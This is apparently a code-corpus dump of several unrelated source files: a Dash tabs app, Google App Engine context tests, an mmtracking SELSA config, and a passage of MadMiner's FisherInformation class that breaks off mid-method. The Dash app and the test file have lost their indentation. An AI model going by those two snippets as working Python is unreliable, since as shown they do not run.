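# (field names come from the code; the concrete values are made up):
#
#   [
#     {"_id": "12345", "annotation": "A person hiking at sunset."},
#     {"_id": "67890", "annotation": "A cup of coffee on a wooden table."}
#   ]
#
# With that input, self.anns maps 12345 -> "A person hiking at sunset."
# and getImgPath(12345) returns 'img_12345.jpg'.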
|
the-stack_0_1552 | import os
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
from app import app, server
style = {'maxWidth': '960px', 'margin': 'auto'}
app.layout = html.Div([
dcc.Tabs(id='tabs', value='tab-intro', children=[
dcc.Tab(label='Intro', value='tab-intro'),
dcc.Tab(label='Examples', value='tab-examples'),
dcc.Tab(label='Map', value='tab-map')
]),
html.Div(id='tabs-content')
], style=style)
from tabs import intro, map, examples
@app.callback(Output('tabs-content', 'children'),
[Input('tabs', 'value')])
def render_content(tab):
if tab == 'tab-intro': return intro.layout
elif tab == 'tab-examples': return examples.layout
elif tab == 'tab-map': return map.layout
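# The callback above swaps the children of #tabs-content whenever the selected
# value of #tabs changes; adding a new tab only requires a new dcc.Tab entry
# above and a matching branch in render_content().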
if __name__ == '__main__':
app.run_server(debug=True) |
the-stack_0_1554 | #!/usr/bin/env python
#
# Copyright 2007 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Tests for google.appengine.runtime.context."""
import os
from unittest import mock
from google.appengine.runtime import context
from google.appengine.runtime.context import ctx_test_util
from absl.testing import absltest
@ctx_test_util.isolated_context
class ContextTest(absltest.TestCase):
def setUp(self):
super().setUp()
orig_val = context.READ_FROM_OS_ENVIRON
def restore():
context.READ_FROM_OS_ENVIRON = orig_val
self.addCleanup(restore)
def testBooleanConversionOnWrite(self):
context.init_from_wsgi_environ({
'HTTP_X_APPENGINE_USER_IS_ADMIN': '1',
})
self.assertEqual(context.gae_headers.USER_IS_ADMIN.get(), True)
def testBooleanConversionOnRead(self):
context.READ_FROM_OS_ENVIRON = False
context.gae_headers.USER_IS_ADMIN.set(True)
self.assertEqual(context.get('USER_IS_ADMIN'), '1')
@mock.patch.dict(os.environ)
@mock.patch.object(context, 'READ_FROM_OS_ENVIRON')
def testReadFrom(self, mock_read_from_os_environ):
del mock_read_from_os_environ
context.gae_headers.USER_ID.set('value in context')
os.environ['USER_ID'] = 'value in os.environ'
with self.subTest('contextvars'):
context.READ_FROM_OS_ENVIRON = False
self.assertEqual(context.get('USER_ID'), 'value in context')
with self.subTest('os.environ'):
context.READ_FROM_OS_ENVIRON = True
self.assertEqual(context.get('USER_ID'), 'value in os.environ')
if __name__ == '__main__':
absltest.main()
|
the-stack_0_1561 | _base_ = [
'../../_base_/models/faster_rcnn_r50_dc5.py',
'../../_base_/datasets/imagenet_vid_fgfa_style.py',
'../../_base_/default_runtime.py'
]
model = dict(
type='SELSA',
detector=dict(
roi_head=dict(
type='SelsaRoIHead',
bbox_roi_extractor=dict(
type='TemporalRoIAlign',
num_most_similar_points=2,
num_temporal_attention_blocks=4,
roi_layer=dict(
type='RoIAlign', output_size=7, sampling_ratio=2),
out_channels=512,
featmap_strides=[16]),
bbox_head=dict(
type='SelsaBBoxHead',
num_shared_fcs=3,
aggregator=dict(
type='SelsaAggregator',
in_channels=1024,
num_attention_blocks=16)))))
# dataset settings
data = dict(
val=dict(
ref_img_sampler=dict(
_delete_=True,
num_ref_imgs=14,
frame_range=[-7, 7],
method='test_with_adaptive_stride')),
test=dict(
ref_img_sampler=dict(
_delete_=True,
num_ref_imgs=14,
frame_range=[-7, 7],
method='test_with_adaptive_stride')))
# optimizer
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(
_delete_=True, grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[2, 5])
# runtime settings
total_epochs = 7
evaluation = dict(metric=['bbox'], interval=7)
|
the-stack_0_1562 | from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import numpy as np
import os
from madminer.analysis import DataAnalyzer
from madminer.utils.various import math_commands, weighted_quantile, sanitize_array, mdot
from madminer.utils.various import less_logging
from madminer.ml import ParameterizedRatioEstimator, ScoreEstimator, Ensemble, load_estimator
logger = logging.getLogger(__name__)
class FisherInformation(DataAnalyzer):
"""
Functions to calculate expected Fisher information matrices.
    After initializing a `FisherInformation` instance with the filename of a MadMiner file, different information matrices
can be calculated:
* `FisherInformation.truth_information()` calculates the full truth-level Fisher information.
This is the information in an idealized measurement where all parton-level particles with their charges, flavours,
and four-momenta can be accessed with perfect accuracy.
* `FisherInformation.full_information()` calculates the full Fisher information in
realistic detector-level observations, estimated with neural networks. In addition to the MadMiner file, this
requires a trained SALLY or SALLINO estimator as well as an unweighted evaluation sample.
* `FisherInformation.rate_information()` calculates the Fisher information in the total cross
section.
* `FisherInformation.histo_information()` calculates the Fisher information in the histogram of
one (parton-level or detector-level) observable.
* `FisherInformation.histo_information_2d()` calculates the Fisher information in a two-dimensional
histogram of two (parton-level or detector-level) observables.
* `FisherInformation.histogram_of_information()` calculates the full truth-level Fisher information in
different slices of one observable (the "distribution of the Fisher information").
Finally, don't forget that in the presence of nuisance parameters the constraint terms also affect the Fisher
information. This term is given by `FisherInformation.calculate_fisher_information_nuisance_constraints()`.
Parameters
----------
filename : str
Path to MadMiner file (for instance the output of `madminer.delphes.DelphesProcessor.save()`).
include_nuisance_parameters : bool, optional
If True, nuisance parameters are taken into account. Default value: True.
"""
def __init__(self, filename, include_nuisance_parameters=True):
super(FisherInformation, self).__init__(filename, False, include_nuisance_parameters)
def truth_information(
self, theta, luminosity=300000.0, cuts=None, efficiency_functions=None, include_nuisance_parameters=True
):
"""
Calculates the full Fisher information at parton / truth level. This is the information in an idealized
measurement where all parton-level particles with their charges, flavours, and four-momenta can be accessed with
perfect accuracy, i.e. the latent variables `z_parton` can be measured directly.
Parameters
----------
theta : ndarray
Parameter point `theta` at which the Fisher information matrix `I_ij(theta)` is evaluated.
luminosity : float
Luminosity in pb^-1.
cuts : None or list of str, optional
Cuts. Each entry is a parseable Python expression that returns a bool (True if the event should pass a cut,
False otherwise). Default value: None.
efficiency_functions : list of str or None
Efficiencies. Each entry is a parseable Python expression that returns a float for the efficiency of one
component. Default value: None.
include_nuisance_parameters : bool, optional
If True, nuisance parameters are taken into account. Default value: True.
Returns
-------
fisher_information : ndarray
Expected full truth-level Fisher information matrix with shape `(n_parameters, n_parameters)`.
fisher_information_uncertainty : ndarray
Covariance matrix of the Fisher information matrix with shape
`(n_parameters, n_parameters, n_parameters, n_parameters)`, calculated with plain Gaussian error
propagation.
"""
# Input
if cuts is None:
cuts = []
if efficiency_functions is None:
efficiency_functions = []
include_nuisance_parameters = include_nuisance_parameters and (self.nuisance_parameters is not None)
# Loop over batches
n_all_parameters = self.n_parameters
if include_nuisance_parameters:
n_all_parameters += self.n_nuisance_parameters
fisher_info = np.zeros((n_all_parameters, n_all_parameters))
covariance = np.zeros((n_all_parameters, n_all_parameters, n_all_parameters, n_all_parameters))
for observations, weights in self.event_loader():
# Cuts
cut_filter = [self._pass_cuts(obs_event, cuts) for obs_event in observations]
observations = observations[cut_filter]
weights = weights[cut_filter]
# Efficiencies
efficiencies = np.array(
[self._eval_efficiency(obs_event, efficiency_functions) for obs_event in observations]
)
weights *= efficiencies[:, np.newaxis]
# Fisher information
this_fisher_info, this_covariance = self._calculate_fisher_information(
theta,
weights,
luminosity,
sum_events=True,
calculate_uncertainty=True,
include_nuisance_parameters=include_nuisance_parameters,
)
fisher_info += this_fisher_info
covariance += this_covariance
return fisher_info, covariance
def full_information(
self,
theta,
model_file,
unweighted_x_sample_file=None,
luminosity=300000.0,
include_xsec_info=True,
mode="score",
calculate_covariance=True,
batch_size=100000,
test_split=0.2,
):
"""
Calculates the full Fisher information in realistic detector-level observations, estimated with neural networks.
In addition to the MadMiner file, this requires a trained SALLY or SALLINO estimator.
Nuisance parameter are taken into account automatically if the SALLY / SALLINO model was trained with them.
Parameters
----------
theta : ndarray
Parameter point `theta` at which the Fisher information matrix `I_ij(theta)` is evaluated.
model_file : str
Filename of a trained local score regression model that was trained on samples from `theta` (see
`madminer.ml.Estimator`).
unweighted_x_sample_file : str or None
Filename of an unweighted x sample that is sampled according to theta and obeys the cuts
(see `madminer.sampling.SampleAugmenter.extract_samples_train_local()`). If None, the Fisher information
is instead calculated on the full, weighted samples (the data in the MadMiner file). Default value: None.
luminosity : float, optional
Luminosity in pb^-1. Default value: 300000.
include_xsec_info : bool, optional
Whether the rate information is included in the returned Fisher information. Default value: True.
mode : {"score", "information"}, optional
How the ensemble uncertainty on the kinematic Fisher information is calculated. If mode is "information",
the Fisher information for each estimator is calculated individually and only then
are the sample mean and covariance calculated. If mode is "score", the sample mean is
calculated for the score for each event. Default value: "score".
calculate_covariance : bool, optional
If True, the covariance between the different estimators is calculated. Default value: True.
batch_size : int, optional
Batch size. Default value: 100000.
test_split : float or None, optional
If unweighted_x_sample_file is None, this determines the fraction of weighted events used for evaluation.
If None, all events are used (this will probably include events used during training!). Default value: 0.2.
Returns
-------
fisher_information : ndarray or list of ndarray
Estimated expected full detector-level Fisher information matrix with shape `(n_parameters, n_parameters)`.
If more then one value ensemble_vote_expectation_weight is given, this is a list with results for all
entries in ensemble_vote_expectation_weight.
fisher_information_uncertainty : ndarray or list of ndarray or None
Covariance matrix of the Fisher information matrix with shape
`(n_parameters, n_parameters, n_parameters, n_parameters)`. If more then one value
ensemble_vote_expectation_weight is given, this is a list with results for all entries in
ensemble_vote_expectation_weight.
"""
# Check input
if mode not in ["score", "information", "modified_score"]:
raise ValueError("Unknown mode {}, has to be 'score', 'modified_score', or 'information'!".format(mode))
# Load Estimator model
if os.path.isdir(model_file) and os.path.exists(model_file + "/ensemble.json"):
model_is_ensemble = True
model = Ensemble()
model.load(model_file)
if isinstance(model.estimators[0], ParameterizedRatioEstimator):
model_type = "Parameterized Ratio Ensemble"
elif isinstance(model.estimators[0], ScoreEstimator):
model_type = "Score Ensemble"
else:
raise RuntimeError("Ensemble is not a score or parameterized_ratio type!")
else:
model_is_ensemble = False
model = load_estimator(model_file)
if isinstance(model, ParameterizedRatioEstimator):
model_type = "Parameterized Ratio Estimator"
elif isinstance(model, ScoreEstimator):
model_type = "Score Estimator"
else:
raise RuntimeError("Estimator is not a score or parameterized_ratio type!")
# Nuisance parameters?
if model.n_parameters == self.n_parameters:
logger.info(
"Found %s parameters in %s model, matching %s physical parameters in MadMiner file",
model.n_parameters,
model_type,
self.n_parameters,
)
include_nuisance_parameters = False
elif model.n_parameters == self.n_parameters + self.n_nuisance_parameters:
logger.info(
"Found %s parameters in %s model, matching %s physical parameters + %s nuisance parameters"
+ " in MadMiner file",
model.n_parameters,
model_type,
self.n_parameters,
self.n_nuisance_parameters,
)
include_nuisance_parameters = True
else:
            raise RuntimeError(
                "Inconsistent numbers of parameters! Found %s in %s model, %s physical parameters in "
                "MadMiner file, and %s nuisance parameters in MadMiner file."
                % (model.n_parameters, model_type, self.n_parameters, self.n_nuisance_parameters)
            )
if include_nuisance_parameters:
logger.debug("Including nuisance parameters")
else:
logger.debug("Not including nuisance parameters")
# Total xsec
total_xsec = self._calculate_xsec(theta=theta)
logger.debug("Total cross section: %s pb", total_xsec)
# Rate part of Fisher information
fisher_info_rate = 0.0
rate_covariance = 0.0
if include_xsec_info:
logger.info("Evaluating rate Fisher information")
fisher_info_rate, rate_covariance = self.rate_information(
theta=theta, luminosity=luminosity, include_nuisance_parameters=include_nuisance_parameters
)
# Evaluation from weighted events
if unweighted_x_sample_file is None:
# Which events to sum over
if test_split is None or test_split <= 0.0 or test_split >= 1.0:
start_event = 0
else:
start_event = int(round((1.0 - test_split) * self.n_samples, 0)) + 1
if start_event > 0:
total_sum_weights_theta = self._calculate_xsec(theta=theta, start_event=start_event)
else:
total_sum_weights_theta = total_xsec
# Theta morphing matrix
theta_matrix = self._get_theta_benchmark_matrix(theta)
# Prepare output
fisher_info_kin = None
covariance = None
# Number of batches
n_batches = int(np.ceil((self.n_samples - start_event) / batch_size))
n_batches_verbose = max(int(round(n_batches / 10, 0)), 1)
for i_batch, (observations, weights_benchmarks) in enumerate(
self.event_loader(
batch_size=batch_size, start=start_event, include_nuisance_parameters=include_nuisance_parameters
)
):
if (i_batch + 1) % n_batches_verbose == 0:
logger.info("Evaluating kinematic Fisher information on batch %s / %s", i_batch + 1, n_batches)
else:
logger.debug("Evaluating kinematic Fisher information on batch %s / %s", i_batch + 1, n_batches)
weights_theta = mdot(theta_matrix, weights_benchmarks)
# Calculate Fisher info on this batch
if model_is_ensemble:
with less_logging():
this_fisher_info, this_covariance = model.calculate_fisher_information(
x=observations,
theta=theta,
obs_weights=weights_theta,
n_events=luminosity * total_xsec * np.sum(weights_theta) / total_sum_weights_theta,
calculate_covariance=calculate_covariance,
mode=mode,
)
else:
with less_logging():
this_fisher_info = model.calculate_fisher_information(
x=observations,
theta=theta,
weights=weights_theta,
n_events=luminosity * total_xsec * np.sum(weights_theta) / total_sum_weights_theta,
)
this_covariance = None
# Sum up results
if fisher_info_kin is None:
fisher_info_kin = this_fisher_info
elif isinstance(fisher_info_kin, list):
for i in range(len(fisher_info_kin)):
fisher_info_kin[i] += this_fisher_info[i]
else:
fisher_info_kin += this_fisher_info
if this_covariance is not None:
if covariance is None:
covariance = this_covariance
elif isinstance(covariance, list):
for i in range(len(covariance)):
covariance[i] += this_covariance[i]
else:
covariance += this_covariance
# Evaluation from unweighted event sample
else:
with less_logging():
if model_is_ensemble:
fisher_info_kin, covariance = model.calculate_fisher_information(
x=unweighted_x_sample_file,
theta=theta,
n_events=luminosity * total_xsec,
mode=mode,
calculate_covariance=calculate_covariance,
)
else:
fisher_info_kin = model.calculate_fisher_information(
x=unweighted_x_sample_file, n_events=luminosity * total_xsec, theta=theta
)
covariance = None
# Returns
if model_is_ensemble:
return fisher_info_rate + fisher_info_kin, rate_covariance + covariance
return fisher_info_rate + fisher_info_kin, rate_covariance
def rate_information(
self, theta, luminosity, cuts=None, efficiency_functions=None, include_nuisance_parameters=True
):
"""
Calculates the Fisher information in a measurement of the total cross section (without any kinematic
information).
Parameters
----------
theta : ndarray
Parameter point `theta` at which the Fisher information matrix `I_ij(theta)` is evaluated.
luminosity : float
Luminosity in pb^-1.
cuts : None or list of str, optional
Cuts. Each entry is a parseable Python expression that returns a bool (True if the event should pass a cut,
False otherwise). Default value: None.
efficiency_functions : list of str or None
Efficiencies. Each entry is a parseable Python expression that returns a float for the efficiency of one
component. Default value: None.
include_nuisance_parameters : bool, optional
If True, nuisance parameters are taken into account. Default value: True.
Returns
-------
fisher_information : ndarray
Expected Fisher information in the total cross section with shape `(n_parameters, n_parameters)`.
fisher_information_uncertainty : ndarray
Covariance matrix of the Fisher information matrix with shape
`(n_parameters, n_parameters, n_parameters, n_parameters)`, calculated with plain Gaussian error
propagation.
"""
include_nuisance_parameters = include_nuisance_parameters and (self.nuisance_parameters is not None)
# Get weights at benchmarks
weights_benchmarks, weights_benchmark_uncertainties = self._calculate_xsec(
cuts=cuts,
efficiency_functions=efficiency_functions,
return_benchmark_xsecs=True,
return_error=True,
include_nuisance_parameters=include_nuisance_parameters,
)
weights_benchmarks = weights_benchmarks.reshape((1, -1))
weights_benchmark_uncertainties = weights_benchmark_uncertainties.reshape((1, -1))
# Get Fisher information
fisher_info, covariance = self._calculate_fisher_information(
theta=theta,
weights_benchmarks=weights_benchmarks,
luminosity=luminosity,
sum_events=True,
calculate_uncertainty=True,
weights_benchmark_uncertainties=weights_benchmark_uncertainties,
include_nuisance_parameters=include_nuisance_parameters,
)
return fisher_info, covariance
def histo_information(
self,
theta,
luminosity,
observable,
bins,
histrange=None,
cuts=None,
efficiency_functions=None,
n_events_dynamic_binning=None,
):
"""
Calculates the Fisher information in the one-dimensional histogram of an (parton-level or detector-level,
depending on how the observations in the MadMiner file were calculated) observable.
Parameters
----------
theta : ndarray
Parameter point `theta` at which the Fisher information matrix `I_ij(theta)` is evaluated.
luminosity : float
Luminosity in pb^-1.
observable : str
Expression for the observable to be histogrammed. The str will be parsed by Python's `eval()` function
and can use the names of the observables in the MadMiner files.
bins : int or ndarray
If int: number of bins in the histogram, excluding overflow bins. Otherwise, defines the bin boundaries
(excluding overflow bins).
histrange : tuple of float or None, optional
Minimum and maximum value of the histogram in the form `(min, max)`. Overflow bins are always added. If
None and bins is an int, variable-width bins with equal cross section are constructed automatically.
Default value: None.
cuts : None or list of str, optional
Cuts. Each entry is a parseable Python expression that returns a bool (True if the event should pass a cut,
False otherwise). Default value: None.
efficiency_functions : list of str or None
Efficiencies. Each entry is a parseable Python expression that returns a float for the efficiency of one
component. Default value: None.
n_events_dynamic_binning : int or None, optional
Number of events used to calculate the dynamic binning (if histrange is None). If None, all events are used.
Note that these events are not shuffled, so if the events in the MadMiner file are sorted, using a value
different from None can cause issues. Default value: None.
Returns
-------
fisher_information : ndarray
Expected Fisher information in the histogram with shape `(n_parameters, n_parameters)`.
fisher_information_uncertainty : ndarray
Covariance matrix of the Fisher information matrix with shape
`(n_parameters, n_parameters, n_parameters, n_parameters)`, calculated with plain Gaussian error
propagation.
"""
# Input
if cuts is None:
cuts = []
if efficiency_functions is None:
efficiency_functions = []
# Binning
bin_boundaries, n_bins_total = self._calculate_binning(
bins, cuts, efficiency_functions, histrange, n_events_dynamic_binning, observable, theta
)
# Loop over batches
weights_benchmarks = np.zeros((n_bins_total, self.n_benchmarks))
weights_squared_benchmarks = np.zeros((n_bins_total, self.n_benchmarks))
for observations, weights in self.event_loader():
# Cuts
cut_filter = [self._pass_cuts(obs_event, cuts) for obs_event in observations]
observations = observations[cut_filter]
weights = weights[cut_filter]
# Efficiencies
efficiencies = np.array(
[self._eval_efficiency(obs_event, efficiency_functions) for obs_event in observations]
)
weights *= efficiencies[:, np.newaxis]
# Evaluate histogrammed observable
histo_observables = np.asarray([self._eval_observable(obs_event, observable) for obs_event in observations])
# Find bins
i_bins = np.searchsorted(bin_boundaries, histo_observables)
assert ((0 <= i_bins) & (i_bins < n_bins_total)).all(), "Wrong bin {}".format(i_bins)
# Add up
for i in range(n_bins_total):
if len(weights[i_bins == i]) > 0:
weights_benchmarks[i] += np.sum(weights[i_bins == i], axis=0)
weights_squared_benchmarks[i] += np.sum(weights[i_bins == i] ** 2, axis=0)
weights_benchmark_uncertainties = weights_squared_benchmarks ** 0.5
# Check cross sections per bin
self._check_binning_stats(weights_benchmarks, weights_benchmark_uncertainties, theta)
# Calculate Fisher information in histogram
fisher_info, covariance = self._calculate_fisher_information(
theta,
weights_benchmarks,
luminosity,
sum_events=True,
weights_benchmark_uncertainties=weights_benchmark_uncertainties,
calculate_uncertainty=True,
)
return fisher_info, covariance
def histo_information_2d(
self,
theta,
luminosity,
observable1,
bins1,
observable2,
bins2,
histrange1=None,
histrange2=None,
cuts=None,
efficiency_functions=None,
n_events_dynamic_binning=None,
):
"""
Calculates the Fisher information in a two-dimensional histogram of two (parton-level or detector-level,
depending on how the observations in the MadMiner file were calculated) observables.
Parameters
----------
theta : ndarray
Parameter point `theta` at which the Fisher information matrix `I_ij(theta)` is evaluated.
luminosity : float
Luminosity in pb^-1.
observable1 : str
Expression for the first observable to be histogrammed. The str will be parsed by Python's `eval()` function
and can use the names of the observables in the MadMiner files.
bins1 : int or ndarray
            If int: number of bins along the first axis in the histogram, excluding overflow bins.
            Otherwise, defines the bin boundaries along the first axis in the histogram (excluding overflow bins).
        observable2 : str
            Expression for the second observable to be histogrammed. The str will be parsed by Python's `eval()` function
            and can use the names of the observables in the MadMiner files.
        bins2 : int or ndarray
            If int: number of bins along the second axis in the histogram, excluding overflow bins.
            Otherwise, defines the bin boundaries along the second axis in the histogram (excluding overflow bins).
        histrange1 : tuple of float or None, optional
            Minimum and maximum value of the first axis of the histogram in the form `(min, max)`. Overflow bins are
            always added. If None, variable-width bins with equal cross section are constructed automatically. Default
            value: None.
        histrange2 : tuple of float or None, optional
            Minimum and maximum value of the second axis of the histogram in the form `(min, max)`. Overflow bins are
always added. If None, variable-width bins with equal cross section are constructed automatically. Default
value: None.
cuts : None or list of str, optional
Cuts. Each entry is a parseable Python expression that returns a bool (True if the event should pass a cut,
False otherwise). Default value: None.
efficiency_functions : list of str or None
Efficiencies. Each entry is a parseable Python expression that returns a float for the efficiency of one
component. Default value: None.
n_events_dynamic_binning : int or None, optional
Number of events used to calculate the dynamic binning (if histrange is None). If None, all events are used.
Note that these events are not shuffled, so if the events in the MadMiner file are sorted, using a value
different from None can cause issues. Default value: None.
Returns
-------
fisher_information : ndarray
Expected Fisher information in the histogram with shape `(n_parameters, n_parameters)`.
fisher_information_uncertainty : ndarray
Covariance matrix of the Fisher information matrix with shape
`(n_parameters, n_parameters, n_parameters, n_parameters)`, calculated with plain Gaussian error
propagation.
"""
# Input
if cuts is None:
cuts = []
if efficiency_functions is None:
efficiency_functions = []
# Binning
bin1_boundaries, n_bins1_total = self._calculate_binning(
bins1, cuts, efficiency_functions, histrange1, n_events_dynamic_binning, observable1, theta
)
bin2_boundaries, n_bins2_total = self._calculate_binning(
bins2, cuts, efficiency_functions, histrange2, n_events_dynamic_binning, observable2, theta
)
# Loop over batches
weights_benchmarks = np.zeros((n_bins1_total, n_bins2_total, self.n_benchmarks))
weights_squared_benchmarks = np.zeros((n_bins1_total, n_bins2_total, self.n_benchmarks))
for observations, weights in self.event_loader():
# Cuts
cut_filter = [self._pass_cuts(obs_event, cuts) for obs_event in observations]
observations = observations[cut_filter]
weights = weights[cut_filter]
# Efficiencies
efficiencies = np.array(
[self._eval_efficiency(obs_event, efficiency_functions) for obs_event in observations]
)
weights *= efficiencies[:, np.newaxis]
# Evaluate histogrammed observable
histo1_observables = np.asarray(
[self._eval_observable(obs_event, observable1) for obs_event in observations]
)
histo2_observables = np.asarray(
[self._eval_observable(obs_event, observable2) for obs_event in observations]
)
# Find bins
i_bins1 = np.searchsorted(bin1_boundaries, histo1_observables)
i_bins2 = np.searchsorted(bin2_boundaries, histo2_observables)
assert ((0 <= i_bins1) & (i_bins1 < n_bins1_total)).all(), "Wrong bin {}".format(i_bins1)
            assert ((0 <= i_bins2) & (i_bins2 < n_bins2_total)).all(), "Wrong bin {}".format(i_bins2)
# Add up
for i in range(n_bins1_total):
for j in range(n_bins2_total):
if len(weights[(i_bins1 == i) & (i_bins2 == j)]) > 0:
weights_benchmarks[i, j] += np.sum(weights[(i_bins1 == i) & (i_bins2 == j)], axis=0)
weights_squared_benchmarks[i, j] += np.sum(
weights[(i_bins1 == i) & (i_bins2 == j)] ** 2, axis=0
)
weights_benchmark_uncertainties = weights_squared_benchmarks ** 0.5
# Calculate Fisher information in histogram
weights_benchmarks = weights_benchmarks.reshape(-1, self.n_benchmarks)
weights_benchmark_uncertainties = weights_benchmark_uncertainties.reshape(-1, self.n_benchmarks)
self._check_binning_stats(
weights_benchmarks, weights_benchmark_uncertainties, theta, n_bins_last_axis=n_bins2_total
)
fisher_info, covariance = self._calculate_fisher_information(
theta,
weights_benchmarks,
luminosity,
sum_events=True,
weights_benchmark_uncertainties=weights_benchmark_uncertainties,
calculate_uncertainty=True,
)
return fisher_info, covariance
def histogram_of_information(
self,
theta,
observable,
nbins,
histrange,
model_file=None,
luminosity=300000.0,
cuts=None,
efficiency_functions=None,
batch_size=100000,
test_split=0.2,
):
"""
Calculates the full and rate-only Fisher information in slices of one observable. For the full
information, it will return the truth-level information if model_file is None, and otherwise the
detector-level information based on the SALLY-type score estimator saved in model_file.
Parameters
----------
theta : ndarray
Parameter point `theta` at which the Fisher information matrix `I_ij(theta)` is evaluated.
observable : str
Expression for the observable to be sliced. The str will be parsed by Python's `eval()` function
and can use the names of the observables in the MadMiner files.
nbins : int
Number of bins in the slicing, excluding overflow bins.
histrange : tuple of float
Minimum and maximum value of the slicing in the form `(min, max)`. Overflow bins are always added.
model_file : str or None, optional
If None, the truth-level Fisher information is calculated. If str, filename of a trained local score
regression model that was trained on samples from `theta` (see `madminer.ml.Estimator`). Default value:
None.
luminosity : float, optional
Luminosity in pb^-1. Default value: 300000.
cuts : None or list of str, optional
Cuts. Each entry is a parseable Python expression that returns a bool (True if the event should pass a cut,
False otherwise). Default value: None.
efficiency_functions : list of str or None
Efficiencies. Each entry is a parseable Python expression that returns a float for the efficiency of one
component. Default value: None.
batch_size : int, optional
If model_file is not None: Batch size. Default value: 100000.
test_split : float or None, optional
If model_file is not None: If unweighted_x_sample_file is None, this determines the fraction of weighted
events used for evaluation.
If None, all events are used (this will probably include events used during training!). Default value: 0.2.
Returns
-------
bin_boundaries : ndarray
Observable slice boundaries.
sigma_bins : ndarray
Cross section in pb in each of the slices.
fisher_infos_rate : ndarray
Expected rate-only Fisher information for each slice. Has shape `(n_slices, n_parameters, n_parameters)`.
fisher_infos_full : ndarray
Expected full Fisher information for each slice. Has shape
`(n_slices, n_parameters, n_parameters)`.
"""
# Input
if cuts is None:
cuts = []
if efficiency_functions is None:
efficiency_functions = []
# Theta morphing matrix
theta_matrix = self._get_theta_benchmark_matrix(theta)
# Number of bins
n_bins_total = nbins + 2
bin_boundaries = np.linspace(histrange[0], histrange[1], num=nbins + 1)
# Prepare output
weights_benchmarks_bins = np.zeros((n_bins_total, self.n_benchmarks))
fisher_info_full_bins = np.zeros((n_bins_total, self.n_parameters, self.n_parameters))
# Main loop: truth-level case
if model_file is None:
for observations, weights in self.event_loader():
# Cuts
cut_filter = [self._pass_cuts(obs_event, cuts) for obs_event in observations]
observations = observations[cut_filter]
weights = weights[cut_filter]
# Efficiencies
efficiencies = np.array(
[self._eval_efficiency(obs_event, efficiency_functions) for obs_event in observations]
)
weights *= efficiencies[:, np.newaxis]
# Fisher info per event
fisher_info_events = self._calculate_fisher_information(theta, weights, luminosity, sum_events=False)
# Evaluate histogrammed observable
histo_observables = np.asarray(
[self._eval_observable(obs_event, observable) for obs_event in observations]
)
# Get rid of nuisance parameters
fisher_info_events = fisher_info_events[:, : self.n_parameters, : self.n_parameters]
# Find bins
bins = np.searchsorted(bin_boundaries, histo_observables)
assert ((0 <= bins) & (bins < n_bins_total)).all(), "Wrong bin {}".format(bins)
# Add up
for i in range(n_bins_total):
if len(weights[bins == i]) > 0:
weights_benchmarks_bins[i] += np.sum(weights[bins == i], axis=0)
fisher_info_full_bins[i] += np.sum(fisher_info_events[bins == i], axis=0)
# ML case
else:
# Load SALLY model
if os.path.isdir(model_file) and os.path.exists(model_file + "/ensemble.json"):
model_is_ensemble = True
model = Ensemble()
model.load(model_file)
else:
model_is_ensemble = False
model = ScoreEstimator()
model.load(model_file)
# Nuisance parameters?
if model.n_parameters == self.n_parameters:
logger.debug(
"Found %s parameters in SALLY model, matching %s physical parameters in MadMiner file",
model.n_parameters,
self.n_parameters,
)
include_nuisance_parameters = False
elif model.n_parameters == self.n_parameters + self.n_nuisance_parameters:
logger.debug(
"Found %s parameters in SALLY model, matching %s physical parameters + %s nuisance parameters"
+ " in MadMiner file",
model.n_parameters,
self.n_parameters,
self.n_nuisance_parameters,
)
include_nuisance_parameters = True
else:
                raise RuntimeError(
                    "Inconsistent numbers of parameters! Found %s in SALLY model, %s physical parameters in "
                    "MadMiner file, and %s nuisance parameters in MadMiner file."
                    % (model.n_parameters, self.n_parameters, self.n_nuisance_parameters)
                )
# Total xsec
total_xsec = self._calculate_xsec(theta=theta)
logger.debug("Total cross section: %s pb", total_xsec)
# Which events to sum over
if test_split is None or test_split <= 0.0 or test_split >= 1.0:
start_event = 0
else:
start_event = int(round((1.0 - test_split) * self.n_samples, 0)) + 1
if start_event > 0:
total_sum_weights_theta = self._calculate_xsec(theta=theta, start_event=start_event)
else:
total_sum_weights_theta = total_xsec
# Number of batches
n_batches = int(np.ceil((self.n_samples - start_event) / batch_size))
n_batches_verbose = max(int(round(n_batches / 10, 0)), 1)
# ML main loop
for i_batch, (observations, weights_benchmarks) in enumerate(
self.event_loader(
batch_size=batch_size, start=start_event, include_nuisance_parameters=include_nuisance_parameters
)
):
if (i_batch + 1) % n_batches_verbose == 0:
logger.info("Evaluating kinematic Fisher information on batch %s / %s", i_batch + 1, n_batches)
else:
logger.debug("Evaluating kinematic Fisher information on batch %s / %s", i_batch + 1, n_batches)
# Cuts
cut_filter = [self._pass_cuts(obs_event, cuts) for obs_event in observations]
observations = observations[cut_filter]
weights_benchmarks = weights_benchmarks[cut_filter]
# Efficiencies
efficiencies = np.array(
[self._eval_efficiency(obs_event, efficiency_functions) for obs_event in observations]
)
weights_benchmarks *= efficiencies[:, np.newaxis]
# Rescale for test_split
if test_split is not None:
correction = np.array([1.0 / test_split for obs_event in observations])
weights_benchmarks *= correction[:, np.newaxis]
weights_theta = mdot(theta_matrix, weights_benchmarks)
# Calculate Fisher info on this batch
if model_is_ensemble:
fisher_info_events, _ = model.calculate_fisher_information(
x=observations,
obs_weights=weights_theta,
n_events=luminosity * np.sum(weights_theta),
mode="score",
calculate_covariance=False,
sum_events=False,
)
else:
fisher_info_events = model.calculate_fisher_information(
x=observations,
weights=weights_theta,
n_events=luminosity * np.sum(weights_theta),
sum_events=False,
)
# Get rid of nuisance parameters
if include_nuisance_parameters:
fisher_info_events = fisher_info_events[:, : self.n_parameters, : self.n_parameters]
# Evaluate histogrammed observable
histo_observables = np.asarray(
[self._eval_observable(obs_event, observable) for obs_event in observations]
)
# Find bins
bins = np.searchsorted(bin_boundaries, histo_observables)
